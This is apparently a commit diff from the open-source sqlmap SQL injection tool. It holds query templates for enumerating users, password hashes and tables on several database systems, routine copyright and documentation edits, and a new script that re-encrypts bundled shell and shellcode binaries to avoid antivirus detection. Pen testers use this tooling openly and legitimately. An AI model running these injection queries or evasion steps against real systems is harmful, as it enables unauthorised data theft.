<dump_table>
<inband query="SELECT %s FROM %s.%s"/>
<blind query="SELECT %s FROM %s.%s LIMIT %d,1" count="SELECT COUNT(*) FROM %s.%s"/>
</dump_table>
<search_db>
<inband query="SELECT name FROM db_user WHERE %s" condition="name"/>
<blind query="SELECT name FROM db_user WHERE %s" count="SELECT COUNT(name) FROM db_user WHERE %s" condition="name"/>
</search_db>
<search_table>
<inband query="SELECT owner_name,class_name FROM db_class WHERE %s" condition="class_name" condition2="owner_name"/>
<blind query="SELECT DISTINCT(owner_name) FROM db_class WHERE %s" query2="SELECT DISTINCT(class_name) FROM db_class WHERE owner_name='%s'" count="SELECT COUNT(DISTINCT(owner_name)) FROM db_class WHERE %s" count2="SELECT COUNT(DISTINCT(class_name)) FROM db_class WHERE owner_name='%s'" condition="class_name" condition2="owner_name"/>
</search_table>
<search_column>
<inband query="SELECT owner_name,db_class.class_name FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE %s" condition="attr_name" condition2="owner_name" condition3="db_class.class_name"/>
<blind query="SELECT DISTINCT(owner_name) FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE %s" query2="SELECT DISTINCT(db_class.class_name) FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE owner_name='%s'" count="SELECT COUNT(DISTINCT(owner_name)) FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE %s" count2="SELECT COUNT(DISTINCT(db_class.class_name)) FROM db_attribute JOIN db_class ON db_attribute.class_name=db_class.class_name WHERE owner_name='%s'" condition="attr_name" condition2="owner_name" condition3="db_class.class_name"/>
</search_column>
</dbms>
<dbms value="InterSystems Cache">
<cast query="CAST(%s AS NVARCHAR(4000))"/>
<length query="CHAR_LENGTH(%s)"/>
<isnull query="COALESCE(%s,' ')"/>
<delimiter query="||"/>
<limit query="SELECT TOP %d %s FROM (%s) WHERE %%VID>%d"/>
<limitregexp query="TOP\s+(\d+)\s+.+?\s+FROM\s+.+?\s+WHERE\s+.+%%VID>(\d+)"/>
<limitgroupstart query="2"/>
<limitgroupstop query="1"/>
<limitstring/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--" query2=";"/>
<substring query="SUBSTR((%s),%d,%d)"/>
<concatenate query="%s||%s"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<inference query="ASCII(SUBSTR((%s),%d,1))>%d"/>
<banner query="$ZVERSION"/>
<current_user query="$USERNAME"/>
<current_db/>
<hostname/>
<table_comment/>
<column_comment/>
<is_dba query="$USERNAME='_SYSTEM'"/>
<check_udf/>
<users/>
<passwords/>
<privileges/>
<roles/>
<statements/>
<dbs>
<inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA" query2="SELECT db FROM mysql.db"/>
<blind query="SELECT TOP 1 schema_name FROM (SELECT TOP ALL schema_name FROM INFORMATION_SCHEMA.SCHEMATA ORDER BY schema_name) WHERE %%VID=%d" count="SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA"/>
</dbs>
<tables>
<inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES" condition="table_schema"/>
<blind query="SELECT TOP 1 table_name FROM (SELECT TOP ALL table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' ORDER BY table_name) WHERE %%VID=%d" count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'"/>
</tables>
<columns>
<inband query="SELECT column_name,data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s' ORDER BY column_name" query2="SELECT data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
<blind query="SELECT TOP 1 %s FROM (SELECT TOP ALL * FROM %s.%s ORDER BY %s) WHERE %%VID=%d" count="SELECT COUNT(*) FROM %s.%s"/>
</dump_table>
<search_db>
<inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
<blind query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" count="SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
</search_db>
<search_table>
<inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="table_name" condition2="table_schema"/>
<blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" condition="table_name" condition2="table_schema"/>
</search_table>
<search_column>
<inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
<blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
</search_column>
</dbms>
<dbms value="eXtremeDB">
<cast query="CAST(%s AS VARCHAR(4000))"/>
<length query="LENGTH(%s)"/>
<isnull query="IFNULL(%s,' ')"/>
<delimiter query="||"/>
<limit query="LIMIT %d,%d"/>
<limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
<limitgroupstart query="1"/>
<limitgroupstop query="2"/>
<limitstring query=" LIMIT "/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--"/>
<substring query="SUBSTR((%s),%d,%d)"/>
<concatenate query="%s||%s"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<inference query="SUBSTR((%s),%d,1)>'%c'"/>
<banner/>
<current_user/>
<current_db/>
<hostname/>
<table_comment/>
<column_comment/>
<is_dba/>
<check_udf/>
<users/>
<passwords/>
<privileges/>
<roles/>
<statements/>
<dbs/>
<tables/>
<columns/>
<dump_table>
<inband query="SELECT %s FROM %s"/>
<blind query="SELECT %s FROM %s LIMIT %d,1" count="SELECT COUNT(*) FROM %s"/>
</dump_table>
<search_db/>
<search_table/>
<search_column/>
</dbms>
<dbms value="FrontBase">
<cast query="CAST(%s AS NCHAR VARYING(4000))"/>
<length query="CHAR_LENGTH(%s)"/>
<isnull query="COALESCE(%s,' ')"/>
<delimiter query="||"/>
<limit query="TOP (%d,%d)"/>
<limitregexp query="\s+TOP\s*\(([\d]+)\s*\,\s*([\d]+)\)" query2="\s+TOP\s+([\d]+)"/>
<limitgroupstart query="1"/>
<limitgroupstop query="2"/>
<limitstring query=" TOP "/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query=";--"/>
<substring query="SUBSTRING((%s) FROM %d FOR %d)"/>
<concatenate query="%s||%s"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
<inference query="SUBSTRING((%s) FROM %d FOR 1)>'%c'"/>
<banner/>
<current_user query="CURRENT_USER"/>
<current_db query="CURRENT_SCHEMA"/>
<hostname/>
<table_comment/>
<column_comment/>
<is_dba query="(SELECT UPPER(CURRENT_USER) FROM INFORMATION_SCHEMA.IO_STATISTICS)='_SYSTEM'"/>
<check_udf/>
<users>
<inband query="SELECT user_name FROM INFORMATION_SCHEMA.USERS"/>
<blind query="SELECT TOP (%d,1) user_name FROM INFORMATION_SCHEMA.USERS" count="SELECT COUNT(user_name) FROM INFORMATION_SCHEMA.USERS"/>
</users>
<passwords>
<inband query="SELECT user_name,password FROM INFORMATION_SCHEMA.USERS" condition="user_name"/>
<blind query="SELECT TOP (%d,1) password FROM INFORMATION_SCHEMA.USERS WHERE user_name='%s'" count="SELECT COUNT(password) FROM INFORMATION_SCHEMA.USERS WHERE user_name='%s'"/>
</passwords>
<privileges/>
<roles/>
<statements/>
<dbs>
<inband query="SELECT &quot;schema_name&quot; FROM INFORMATION_SCHEMA.SCHEMATA"/>
<blind query="SELECT TOP (%d,1) &quot;schema_name&quot; FROM INFORMATION_SCHEMA.SCHEMATA" count="SELECT COUNT(&quot;schema_name&quot;) FROM INFORMATION_SCHEMA.SCHEMATA"/>
</dbs>
<tables>
<inband query="SELECT &quot;schema_name&quot;,&quot;table_name&quot; FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk" condition="&quot;schema_name&quot;"/>
<blind query="SELECT TOP (%d,1) &quot;table_name&quot; FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk WHERE &quot;schema_name&quot;='%s'" count="SELECT COUNT(&quot;table_name&quot;) FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk WHERE &quot;schema_name&quot;='%s'"/>
</tables>
<columns>
<inband query="SELECT &quot;column_name&quot;,data_type FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.DATA_TYPE_DESCRIPTOR,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.DATA_TYPE_DESCRIPTOR.column_name_pk=INFORMATION_SCHEMA.COLUMNS.column_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND &quot;table_name&quot;='%s' AND &quot;schema_name&quot;='%s'" condition="&quot;column_name&quot;"/>
<blind query="SELECT &quot;column_name&quot; FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND &quot;table_name&quot;='%s' AND &quot;schema_name&quot;='%s'" query2="SELECT data_type FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.DATA_TYPE_DESCRIPTOR,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.DATA_TYPE_DESCRIPTOR.column_name_pk=INFORMATION_SCHEMA.COLUMNS.column_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND &quot;table_name&quot;='%s' AND &quot;column_name&quot;='%s' AND &quot;schema_name&quot;='%s'" count="SELECT COUNT(&quot;column_name&quot;) FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND &quot;table_name&quot;='%s' AND &quot;schema_name&quot;='%s'" condition="&quot;column_name&quot;"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s.%s"/>
<blind query="SELECT TOP (%d,1) %s FROM %s.%s" count="SELECT COUNT(*) FROM %s.%s"/>
</dump_table>
<search_db>
<inband query="SELECT &quot;schema_name&quot; FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="&quot;schema_name&quot;"/>
<blind query="SELECT &quot;schema_name&quot; FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" count="SELECT COUNT(&quot;schema_name&quot;) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="&quot;schema_name&quot;"/>
</search_db>
<search_table>
<inband query="SELECT &quot;schema_name&quot;,&quot;table_name&quot; FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk WHERE %s" condition="&quot;table_name&quot;" condition2="&quot;schema_name&quot;"/>
<blind query="SELECT &quot;schema_name&quot; FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk WHERE %s" query2="SELECT &quot;table_name&quot; FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk WHERE &quot;schema_name&quot;='%s'" count="SELECT COUNT(&quot;schema_name&quot;) FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk WHERE %s" count2="SELECT COUNT(&quot;table_name&quot;) FROM INFORMATION_SCHEMA.TABLES AS a JOIN INFORMATION_SCHEMA.SCHEMATA AS b ON a.schema_pk=b.schema_pk WHERE &quot;schema_name&quot;='%s'" condition="&quot;table_name&quot;" condition2="&quot;schema_name&quot;"/>
</search_table>
<!-- NOTE: Not working properly with DISTINCT(...) in subquery -->
<search_column>
<inband query="SELECT &quot;schema_name&quot;,&quot;table_name&quot; FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND %s" condition="&quot;column_name&quot;" condition2="&quot;schema_name&quot;" condition3="&quot;table_name&quot;"/>
<blind query="SELECT &quot;schema_name&quot; FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND %s" query2="SELECT &quot;table_name&quot; FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND &quot;schema_name&quot;='%s'" count="SELECT COUNT(&quot;schema_name&quot;) FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND %s" count2="SELECT COUNT(&quot;table_name&quot;) FROM INFORMATION_SCHEMA.COLUMNS,INFORMATION_SCHEMA.TABLES,INFORMATION_SCHEMA.SCHEMATA WHERE INFORMATION_SCHEMA.COLUMNS.table_pk=INFORMATION_SCHEMA.TABLES.table_pk AND INFORMATION_SCHEMA.TABLES.schema_pk=INFORMATION_SCHEMA.SCHEMATA.schema_pk AND &quot;schema_name&quot;='%s'" condition="&quot;column_name&quot;" condition2="&quot;schema_name&quot;" condition3="&quot;table_name&quot;"/>
</search_column>
</dbms>
</root>

3
doc/CHANGELOG.md
View File

@@ -6,14 +6,17 @@
# Version 1.3 (2019-01-05)
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1)
# Version 1.2 (2018-01-08)
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1)
# Version 1.1 (2017-04-07)
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1)
# Version 1.0 (2016-02-27)

9
doc/THANKS.md
View File

@@ -112,6 +112,9 @@ Alessio Dalla Piazza, <alessio.dallapiazza(at)gmail.com>
Sherif El-Deeb, <archeldeeb(at)gmail.com>
* for reporting a minor bug
Thomas Etrillard, <thomas.etrillard(at)synacktiv.com>
* for contributing the IBM DB2 error-based payloads (RAISE_ERROR)
Stefano Di Paola, <stefano.dipaola(at)wisec.it>
* for suggesting good features
@@ -317,6 +320,9 @@ Michael Majchrowicz, <mmajchrowicz(at)gmail.com>
Vinícius Henrique Marangoni, <vinicius_marangoni1(at)hotmail.com>
* for contributing a Portuguese translation of README.md
Francesco Marano, <francesco.mrn24(at)gmail.com>
* for contributing the Microsoft SQL Server/Sybase error-based - Stacking (EXEC) payload
Ahmad Maulana, <matdhule(at)gmail.com>
* for contributing a tamper script halfversionedmorekeywords.py
@@ -486,6 +492,9 @@ Marek Sarvas, <marek.sarvas(at)gmail.com>
Philippe A. R. Schaeffer, <schaeff(at)compuphil.de>
* for reporting a minor bug
Henri Salo <henri(at)nerv.fi>
* for a donation
Mohd Zamiri Sanin, <zamiri.sanin(at)gmail.com>
* for reporting a minor bug

2
doc/THIRD-PARTY.md
View File

@@ -277,7 +277,7 @@ be bound by the terms and conditions of this License Agreement.
* The `bottle` web framework library located under `thirdparty/bottle/`.
Copyright (C) 2012, Marcel Hellkamp.
* The `identYwaf` library located under `thirdparty/identywaf/`.
Copyright (C) 2019, Miroslav Stampar.
Copyright (C) 2019-2020, Miroslav Stampar.
* The `ordereddict` library located under `thirdparty/odict/`.
Copyright (C) 2009, Raymond Hettinger.
* The `six` Python 2 and 3 compatibility library located under `thirdparty/six/`.

2
doc/translations/README-fr-FR.md
View File

@@ -32,7 +32,7 @@ Pour afficher une liste complète des options et des commutateurs (switches), ta
python sqlmap.py -hh
Vous pouvez regarder un vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples.
Vous pouvez regarder une vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples.
Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge, la description de toutes les options, ainsi que des exemples, nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
Liens

2
doc/translations/README-id-ID.md
View File

@@ -43,7 +43,7 @@ Tautan
* Situs: http://sqlmap.org
* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* Pelacak Masalah: https://github.com/sqlmapproject/sqlmap/issues
* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Twitter: [@sqlmap](https://twitter.com/sqlmap)

3
doc/translations/README-pt-BR.md
View File

@@ -14,8 +14,7 @@ Você pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sql
Instalação
----
Você pode baixar o arquivo tar mais recente clicando [aqui]
(https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master).
Você pode baixar o arquivo tar mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master).
De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap):

2
extra/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

2
extra/beep/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

2
extra/beep/beep.py
View File

@@ -3,7 +3,7 @@
"""
beep.py - Make a beep sound
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

2
extra/cloak/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

18
extra/cloak/cloak.py
View File

@@ -3,7 +3,7 @@
"""
cloak.py - Simple file encryption/compression utility
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -19,28 +19,26 @@ from optparse import OptionParser
if sys.version_info >= (3, 0):
xrange = range
ord = lambda _: _
def hideAscii(data):
retVal = b""
for i in xrange(len(data)):
value = data[i] if isinstance(data[i], int) else ord(data[i])
retVal += struct.pack('B', value ^ (127 if value < 128 else 0))
KEY = b"cwRAopWDYixMeqs3"
return retVal
def xor(message, key):
return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
def cloak(inputFile=None, data=None):
if data is None:
with open(inputFile, "rb") as f:
data = f.read()
return hideAscii(zlib.compress(data))
return xor(zlib.compress(data), KEY)
def decloak(inputFile=None, data=None):
if data is None:
with open(inputFile, "rb") as f:
data = f.read()
try:
data = zlib.decompress(hideAscii(data))
data = zlib.decompress(xor(data, KEY))
except Exception as ex:
print(ex)
print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile)
@@ -52,7 +50,7 @@ def decloak(inputFile=None, data=None):
def main():
usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
parser = OptionParser(usage=usage, version='0.1')
parser = OptionParser(usage=usage, version='0.2')
try:
parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')

2
extra/dbgtool/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

2
extra/dbgtool/dbgtool.py
View File

@@ -3,7 +3,7 @@
"""
dbgtool.py - Portable executable to ASCII debug script converter
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

BIN
extra/icmpsh/icmpsh.exe_
View File

Binary file not shown.

BIN
extra/runcmd/runcmd.exe_
View File

Binary file not shown.

BIN
extra/shellcodeexec/linux/shellcodeexec.x32_
View File

Binary file not shown.

BIN
extra/shellcodeexec/linux/shellcodeexec.x64_
View File

Binary file not shown.

BIN
extra/shellcodeexec/windows/shellcodeexec.x32.exe_
View File

Binary file not shown.

2
extra/shutils/blanks.sh
View File

@@ -1,6 +1,6 @@
#!/bin/bash
# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Removes trailing spaces from blank lines inside project files

4
extra/shutils/drei.sh
View File

@@ -1,13 +1,13 @@
#!/bin/bash
# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Stress test against Python3
export SQLMAP_DREI=1
#for i in $(find . -iname "*.py" | grep -v __init__); do python3 -c 'import '`echo $i | cut -d '.' -f 2 | cut -d '/' -f 2- | sed 's/\//./g'`''; done
for i in $(find . -iname "*.py" | grep -v __init__); do PYTHONWARNINGS=all python3.7 -m compileall $i | sed 's/Compiling/Checking/g'; done
for i in $(find . -iname "*.py" | grep -v __init__); do PYTHONWARNINGS=all python3 -m compileall $i | sed 's/Compiling/Checking/g'; done
unset SQLMAP_DREI
source `dirname "$0"`"/junk.sh"

2
extra/shutils/duplicates.py
View File

@@ -1,6 +1,6 @@
#!/usr/bin/env python
# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Removes duplicate entries in wordlist like files

2
extra/shutils/junk.sh
View File

@@ -1,6 +1,6 @@
#!/bin/bash
# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
find . -type d -name "__pycache__" -exec rm -rf {} \; &>/dev/null

2
extra/shutils/modernize.sh
View File

@@ -1,6 +1,6 @@
#!/bin/bash
# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# sudo pip install modernize

2
extra/shutils/pycodestyle.sh
View File

@@ -1,6 +1,6 @@
#!/bin/bash
# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle)

6
extra/shutils/pydiatra.sh
View File

@@ -1,7 +1,7 @@
#!/bin/bash
# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs py2diatra on all python files (prerequisite: pip install pydiatra)
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py2diatra '{}' \; | grep -v bare-except
# Runs py3diatra on all python files (prerequisite: pip install pydiatra)
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py3diatra '{}' \; | grep -v bare-except

2
extra/shutils/pyflakes.sh
View File

@@ -1,6 +1,6 @@
#!/bin/bash
# Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)

6
extra/shutils/pylint.sh Executable file
View File

@@ -0,0 +1,6 @@
#!/bin/bash
# Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
# See the file 'LICENSE' for copying permission
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pylint --rcfile=./.pylintrc '{}' \;

4
extra/shutils/pypi.sh
View File

@@ -16,7 +16,7 @@ cat > $TMP_DIR/setup.py << EOF
#!/usr/bin/env python
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -67,7 +67,7 @@ cat > sqlmap/__init__.py << EOF
#!/usr/bin/env python
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

16
extra/shutils/recloak.sh Executable file
View File

@@ -0,0 +1,16 @@
#!/bin/bash
# NOTE: this script is for dev usage after AV something something
DIR=$(cd -P -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd -P)
cd $DIR/../..
for file in $(find -regex ".*\.[a-z]*_" -type f | grep -v wordlist); do python extra/cloak/cloak.py -d -i $file; done
cd $DIR/../cloak
sed -i 's/KEY = .*/KEY = b"'`python -c 'import random; import string; print("".join(random.sample(string.ascii_letters + string.digits, 16)))'`'"/g' cloak.py
cd $DIR/../..
for file in $(find -regex ".*\.[a-z]*_" -type f | grep -v wordlist); do python extra/cloak/cloak.py -i `echo $file | sed 's/_$//g'`; done
git clean -f > /dev/null

2
extra/vulnserver/__init__.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

19
extra/vulnserver/vulnserver.py
View File

@@ -3,12 +3,13 @@
"""
vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes)
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function
import base64
import json
import re
import sqlite3
@@ -18,6 +19,7 @@ import traceback
PY3 = sys.version_info >= (3, 0)
UNICODE_ENCODING = "utf-8"
